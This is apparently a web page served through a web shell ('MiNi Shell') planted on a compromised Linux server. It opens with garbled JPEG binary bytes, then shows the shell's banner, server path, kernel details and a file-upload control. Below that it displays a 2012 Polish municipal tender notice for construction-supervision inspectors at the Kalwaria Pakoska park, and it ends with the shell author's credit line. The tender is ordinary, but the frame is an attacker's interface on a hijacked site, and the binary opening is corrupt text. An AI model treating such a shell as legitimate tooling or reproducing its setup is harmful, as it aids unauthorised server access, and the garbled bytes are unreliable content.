JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/79633-N-2012.html

<p class="kh_header"><b>Pakość: Kontynuacja pełnienia funkcji Inspektora Nadzoru Inwestorskiego nad inwestycją pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk</b><br>
<b>Numer ogłoszenia: 79633 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pakość , ul. Rynek 4, 88-170 Pakość, woj. kujawsko-pomorskie, tel. 052 5666073 (74), 5666089, faks 052 5666075.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontynuacja pełnienia funkcji Inspektora Nadzoru Inwestorskiego nad inwestycją pn.: Utworzenie parku kulturowego Kalwaria Pakoska jako elementu promocji dziedzictwa Kujaw i Pałuk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kontynuacja pełnienia funkcji nadzoru inwestorskiego nad robotami budowlanymi dla Projektu pn.:  Utworzenie parku kulturowego Kalwaria Pakoska  jako elementu promocji dziedzictwa Kujaw i Pałuk  udzielenie zamówienia w trybie przetargu nieograniczonego wynika z konieczności odstąpienia od umowy z dotychczasowym Wykonawcą.
Dotychczasowy Wykonawca pełniący funkcje nadzoru inwestorskiego realizował postanowienia zawartej umowy przez okres12 m-cy. Niniejsza procedura dotyczy kontynuacji pełnienia nadzoru inwestorskiego przez okres 5 m-cy od dnia 1 maja 2012r. do dnia 30 września 2012r. - termin realizacji robót budowlanych.  Zaawansowanie robót budowlanych na dzień 31 styczeń 2012r. - 45,75%
Przedmiot zamówienia jako całość dotyczy następujących branż/specjalności:
- konstrukcyjno - budowlanej  robót kubaturowych  
-drogowej 
-kanalizacyjnej
- sieci i instalacji elektrycznych -obejmującej instalacje elektryczne, napowietrzne i kablowe linie energetyczne, stacje i urządzenia elektroenergetyczne i oświetleniowe 
-teletechnicznej 
-z zakresu terenów zielonych objętych ochroną konserwatora przyrody 
-rzeczowego i finansowego rozliczenia Projektu 
Uwaga: 
Zamawiający dopuszcza łączenie funkcji inspektorów nadzoru poszczególnych branż wymienionych powyżej pod warunkiem wykazania się niezbędnymi uprawnieniami do kierowania i nadzorowania robotami w każdej z łączonej branży. (Jedna osoba może pełnić funkcję maksymalnie dwóch inspektorów). 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.
Pracami inspektorów poszczególnych branż kieruje wyznaczony przez Wykonawcę usługi koordynator. 
UWAGA!!
Zamawiający wymaga od wykonawcy wiedzy i umiejętności niezbędnych do rzeczowego i finansowego rozliczania Projektu, co nie skutkuje koniecznością posiadania dodatkowej osoby, o takich umiejętnościach. Wykonawca ma prawo wyznaczyć do tego zakresu osobę lub osoby, która(e) będzie(będą) pełnić również inną funkcję nadzorczą.

Częstotliwość pobytów inspektorów na budowie:
1) konstrukcyjno - budowlaną robót kubaturowych  - minimum 3 x w tygodniu 
2)drogową - minimum 3 x w tygodniu 
3)kanalizacyjną - minimum 3 x w tygodniu 
4) sieci i instalacji elektrycznych -obejmująca instalacje elektryczne, napowietrzne i kablowe linie   
    energetyczne, stacje i urządzenia elektroenergetyczne i oświetleniowe - minimum 3 x w tygodniu 
4)	teletechniczną - minimum 3 x w tygodniu
5)	Koordynator - minimum 4 x w tygodniu (może być to osoba wyłoniona z inspektorów poszczególnych branż).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.35.61.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 1. Oświadczenie na podstawie art. 22 ust. 1
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonywanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi wykonano lub są wykonywane należycie- 
Wykonawcy składają w ofercie wykaz uzupełniony wg załącznika nr 4 (doświadczenie wykonawcy i podwykonawcy) do SIWZ oraz referencje. Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej jednej usługi dotyczącej nadzoru nad inwestycją kubaturową  o wartości minimum 5.000.000,00zł:</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 1. Oświadczenie na podstawie art. 22 ust. 1
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy załączają wykaz osób (poprzez uzupełnienie załącznika nr 6 do SIWZ- Wykaz osób) , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
1) dla części I przedmiotu zamówienia:
a) Koordynator - Kierownik   Zespołu   Nadzoru   pełniący rolę koordynatora Inspektorów Nadzoru  
   Inwestorskiego (odpowiedzialny za przebieg nadzoru nad wykonawstwem robót) - minimum 1 osoba z  
   co najmniej   5   letnim doświadczeniem   na   stanowisku   inspektora   nadzoru   inwestorskiego   (w 
   rozumieniu   Prawa  Budowlanego)  lub  kierownika  budowy, z uprawnieniami do kierowania robotami 
   budowlanymi i  nadzorowania  w  specjalności  drogowej i/ lub  konstrukcyjno -  budowlanej.  Inżynier 
   Koordynator może pełnić funkcję jednego z Inspektorów Nadzoru, 

b) inspektor   nadzoru   odpowiedzialny   za   roboty   drogowe - minimum 1  osoba  z  uprawnieniami do 
    kierowania robotami budowlanymi i nadzorowania w specjalności drogowej oraz   doświadczeniem   w 
    branży minimum 5 lat (od uzyskania uprawnień) na stanowisku inspektora  nadzoru inwestorskiego  (w 
    rozumieniu Prawa Budowlanego) lub kierownika budowy, 

c) inspektor   nadzoru   inwestorskiego   robót   kanalizacyjnych - minimum  1 osoba z uprawnieniami do 
    nadzorowania robót w  zakresie sieci,  instalacji  i  urządzeń   cieplnych,   wentylacyjnych,   gazowych, 
    wodociągowych  i  kanalizacyjnych  oraz  doświadczeniem  w  branży  minimum  5 lat (od  uzyskania 
    uprawnień)  na  stanowisku  inspektora  nadzoru  inwestorskiego  lub  kierownika  budowy/robót danej    
    branży, 

d) inspektor    nadzoru    inwestorskiego   ds.  sieci   i   instalacji   elektrycznych -obejmującej    instalacje 
    elektryczne,   napowietrzne   i   kablowe   linie  energetyczne, stacje i urządzenia  elektroenergetyczne i   
    oświetleniowe - minimum 1   osoba   z   uprawnieniami   do   nadzorowania   robót   sieci   i   instalacji   
    elektrycznych  j.w.   oraz   doświadczeniem   w   branży  minimum  5 lat (od uzyskania uprawnień) na 
    stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy/robót danej branży, 


e) inspektor   nadzoru   inwestorskiego   branży   teletechnicznej - minimum 1 osoba z uprawnieniami do 
    nadzorowania robót w zakresie branży teletechnicznej oraz doświadczeniem w branży minimum 5 lat  
   (od uzyskania uprawnień)    na    stanowisku    inspektora    nadzoru   inwestorskiego   lub   kierownika 
   budowy/robót danej branży,

f) inspektor   nadzoru    inwestorskiego    robót   kubaturowych  - minimum 1  osoba    z   uprawnieniami  
   konstrukcyjno-budowlanymi    bez    ograniczeń    do    nadzorowania   robót    kubaturowych    oraz  
  doświadczeniem w branży minimum 5 lat (od uzyskania uprawnień) na stanowisku inspektora nadzoru 
   inwestorskiego lub kierownika budowy/robót danej branży,



Uwaga: 
Zamawiający dopuszcza łączenie funkcji inspektorów nadzoru poszczególnych branż wymienionych powyżej pod warunkiem wykazania się niezbędnymi uprawnieniami do kierowania i nadzorowania robotami w każdej z łączonej branży. (Jedna osoba może pełnić funkcję maksymalnie dwóch inspektorów). 
 Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 1. Oświadczenie na podstawie art. 22 ust. 1
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej  
    umowy:
2.1.Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie wniosku    
      o dopuszczenie do udziału w postępowaniu, jedynie za uprzednią pisemną zgodą zamawiającego,  
      akceptującego nowego kluczowego specjalistę.
2.1.1.Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących   
         przypadkach:
1)	   śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
2)	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy, 
3)	   jeżeli zmiana kluczowego specjalisty staje się konieczna z jakichkolwiek innych przyczyn           
         niezależnych od wykonawcy (np. rezygnacji itp.)

2.1.2.Zamawiający może żądać od wykonawcy zmiany kluczowego specjalisty jeżeli uzna, że nie wykonuje on swych obowiązków wynikających z umowy.
2.1.3. W przypadku zmiany kluczowego specjalisty nowy kluczowy specjalista musi spełniać wymagania  
          określone dla danego specjalisty.
2.1.4. Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem Zamawiającego  
          w terminie wskazanym we wniosku zamawiającego.
2.2. W przypadku zwiększenia wykonywania robót budowlanych inspektor nadzoru nie  będzie  pobierał  
       wynagrodzenia za okres zawieszenia robót  budowlanych. W  takim   przypadku   strony   przedłużą     
       wynikający z umowy okres wykonywania usługi o czas zawieszenia wykonania robót budowlanych.
2.3. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie  
       obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
2.4. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia  
       zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na  
       sfinansowanie zamówienia lub i umowy na roboty budowlane.
2.5. Zamawiający może nie wyrazić zgody na zmianę umowy, jeżeli proponowana zmiana  może wpłynąć  
       na opóźnienie lub zwiększenie kosztów w wykonaniu niniejszej umowy albo umowy na roboty 
       budowlane czy obniżenie jakości wykonania którejkolwiek z tych umów.
2.6. Inspektor nadzoru nie będzie uprawniony do żądanego przedłużenia terminu wykonania umowy i  
       zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy 
       przez inspektora nadzoru. W takim przypadku koszty dodatkowe związane z takimi zmianami ponosi 
       inspektor nadzoru.
2.7. Wyniknie konieczność przedłużenia terminu umownego z powodu:
        - działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności (np. przeszkody  atmosferyczne   
          o charakterze katastrof). Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych   
          w czasie realizacji usługi nadzoru nad wykonywaniem robót budowlanych,  który   przy   składaniu   
          ofert musi być normalnie brany pod uwagę.
-	z przyczyn niezależnych od Zamawiającego tj. z powodu:
       a. nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których  
                 Zamawiający nie mógł przewidzieć w chwili zawarcia umowy
             b. decyzji służb konserwatorskich mających wpływ na przesunięcie terminu realizacji robót                  takich jak wstrzymanie budowy, konieczność wykonania dodatkowych badań                   archeologicznych /konserwatorskich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pakosc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego - pokój nr 18, I piętro ul. Rynek 4, 88-170 Pakość...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2012 godzina 09:30, miejsce: Urząd Miejski w Pakości, ul. Rynek 4, 88-170 Pakość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane przy udziale środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko- Pomorskiego na lata 2007 -2013 oraz ze środków własnych Gminy Pakość..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com